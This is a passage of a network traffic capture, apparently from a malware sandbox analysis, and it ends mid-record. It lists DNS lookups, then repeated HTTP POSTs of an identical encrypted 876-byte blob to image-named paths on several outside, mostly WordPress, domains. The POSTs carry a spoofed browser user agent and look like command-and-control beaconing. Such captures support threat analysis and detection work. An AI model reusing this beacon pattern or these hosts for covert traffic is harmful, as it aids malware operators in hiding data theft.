Sep 9, 2024 12:07:28.496293068 CEST	53	58035	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:28.499510050 CEST	56574	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:28.515229940 CEST	53	56574	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:29.128794909 CEST	64707	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:29.145878077 CEST	53	64707	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:30.577294111 CEST	57157	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:30.607311964 CEST	53	57157	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:30.608632088 CEST	62669	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:31.017535925 CEST	53	62669	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:31.645611048 CEST	64630	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:31.874669075 CEST	53	64630	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:33.041030884 CEST	49408	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:33.077308893 CEST	53	49408	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:34.381134033 CEST	54634	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:34.392524004 CEST	53	54634	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:34.395190954 CEST	51329	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:34.467374086 CEST	53	51329	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:36.527848959 CEST	60950	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:36.541937113 CEST	53	60950	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:37.396486044 CEST	59279	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:37.420089960 CEST	53	59279	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:38.671502113 CEST	52466	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:38.773215055 CEST	53	52466	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:39.891870975 CEST	52630	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:40.020602942 CEST	53	52630	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:41.781543016 CEST	60891	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:41.803149939 CEST	53	60891	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:42.446377039 CEST	53057	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:42.483187914 CEST	53	53057	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:43.351290941 CEST	53451	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:43.396322012 CEST	53	53451	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:43.678716898 CEST	56356	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:43.747555971 CEST	53	56356	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:44.813524961 CEST	64688	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:45.541176081 CEST	53	64688	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:47.703432083 CEST	55395	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:47.736159086 CEST	53	55395	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:51.064898014 CEST	60550	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:51.409773111 CEST	53	60550	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:53.644925117 CEST	60348	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:53.654057026 CEST	53	60348	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:53.655821085 CEST	62407	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:53.722963095 CEST	53	62407	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:55.275046110 CEST	57974	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:55.486047983 CEST	53	57974	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:55.569734097 CEST	55487	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:55.579142094 CEST	53	55487	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:55.581552982 CEST	62811	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:55.735584021 CEST	53	62811	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:56.888679981 CEST	63948	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:57.593336105 CEST	53	63948	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:59.103034019 CEST	49383	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:59.148766041 CEST	53	49383	1.1.1.1	192.168.2.4
Sep 9, 2024 12:07:59.776489973 CEST	63129	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:07:59.818485022 CEST	53	63129	1.1.1.1	192.168.2.4
Sep 9, 2024 12:08:00.438028097 CEST	53470	53	192.168.2.4	1.1.1.1
Sep 9, 2024 12:08:00.686120987 CEST	53	53470	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:04 UTC	281	OUT	POST /admin/temp/eghuey.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: parksideseniorliving.net
2024-09-09 10:07:04 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:05 UTC	539	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Sep 2024 10:07:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Cache-Enabled: True X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Link: <https://parksideseniorliving.net/wp-json/>; rel="https://api.w.org/" X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1
2024-09-09 10:07:05 UTC	15845	IN	Data Raw: 66 65 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 20 3e 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e Data Ascii: fe60<!DOCTYPE html><html lang="en-US"><head ><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:05 UTC	274	OUT	POST /admin/images/ff.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: lashandbrowenvy.com
2024-09-09 10:07:05 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:07 UTC	741	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Sep 2024 10:07:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, must-revalidate, max-age=0 content-security-policy: upgrade-insecure-requests expires: Wed, 11 Jan 1984 05:00:00 GMT link: <https://lashandbrowenvy.com/wp-json/>; rel="https://api.w.org/" strict-transport-security: max-age=300 strict-transport-security: max-age=31536000; includeSubDomains x-cacheproxy-retries: 0/2 x-content-type-options: nosniff x-fawn-proc-count: 1,0,24 x-php-version: 8.0 x-xss-protection: 1; mode=block x-backend: varnish_ssl CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c065e8d9c134390-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:07 UTC	628	IN	Data Raw: 32 32 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 67 66 6f 72 6d 3b 67 66 6f 72 6d 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 67 66 6f 72 6d 5f 6d 61 69 6e 5f 73 63 72 69 70 74 73 5f 6c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 66 6f 72 6d 2e 73 63 72 69 70 74 73 4c 6f 61 64 65 64 3d 21 30 7d 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 66 6f 72 6d 2e 64 6f 6d 4c 6f 61 64 65 64 3d 21 30 7d 29 2c 67 66 6f 72 6d 3d 7b 64 6f 6d 4c 6f 61 64 Data Ascii: 2282<!DOCTYPE html><html lang="en-US"><head> <script>var gform;gform\|\|(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoad
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 65 72 22 2c 6f 2c 6e 2c 72 2c 74 29 7d 2c 64 6f 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 67 66 6f 72 6d 2e 64 6f 48 6f 6f 6b 28 22 61 63 74 69 6f 6e 22 2c 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 61 70 70 6c 79 46 69 6c 74 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 67 66 6f 72 6d 2e 64 6f 48 6f 6f 6b 28 22 66 69 6c 74 65 72 22 2c 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 72 65 6d 6f 76 65 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 6e 29 7b 67 66 6f 72 6d 2e 72 65 6d 6f 76 65 48 6f 6f 6b 28 22 61 63 74 69 6f 6e 22 2c 6f 2c 6e 29 7d 2c 72 65 6d 6f 76 65 46 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 6e 2c 72 29 7b 67 66 6f 72 6d 2e 72 65 6d 6f 76 65 48 6f 6f 6b 28 22 66 69 6c 74 65 72 22 2c 6f 2c Data Ascii: er",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 22 20 Data Ascii: gins/seo/ --><title>Page not found - Lash & Brow Envy</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Lash & Brow Envy" /><meta property="og:site_name" content="Lash & Brow Envy"
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 30 6b 66 2e 66 62 63 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 74 61 74 73 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 Data Ascii: "image":{"@id":"https://0kf.fbc.myftpupload.com/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//stats.wp.com' /><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel='dns-prefetch' hre
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 Data Ascii: sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.c
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 Data Ascii: ,n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==ty
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 74 72 69 70 65 2d 6d 61 69 6e 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 73 68 61 6e 64 62 72 6f 77 65 6e 76 79 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 6d 75 2d 70 6c 75 67 69 6e 73 2f 76 65 6e 64 6f 72 2f 67 6f 64 61 64 64 79 2f 6d 77 63 2d 63 6f 72 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 74 72 69 70 65 2d 73 65 74 74 69 6e 67 73 2e 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 Data Ascii: .wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='stripe-main-styles-css' href='https://lashandbrowenvy.com/wp-content/mu-plugins/vendor/godaddy/mwc-core/assets/css/stripe-settings.css' media='all' /><style
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 35 64 37 65 0d 0a 66 66 66 66 66 66 61 36 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74 Data Ascii: 5d7effffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-t
2024-09-09 10:07:07 UTC	1369	IN	Data Raw: 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 68 65 69 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 Data Ascii: tyle-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-t

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:07 UTC	276	OUT	POST /wp-content/assets/iybw.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: rsidesigns.com
2024-09-09 10:07:07 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:08 UTC	153	IN	HTTP/1.1 405 Not Allowed Date: Mon, 09 Sep 2024 10:07:08 GMT Content-Type: text/html Content-Length: 163 Connection: close X-Edge-Location: Mono
2024-09-09 10:07:08 UTC	163	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:09 UTC	285	OUT	POST /wp-content/assets/umjrglicgx.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: pansionatblago.ru
2024-09-09 10:07:09 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 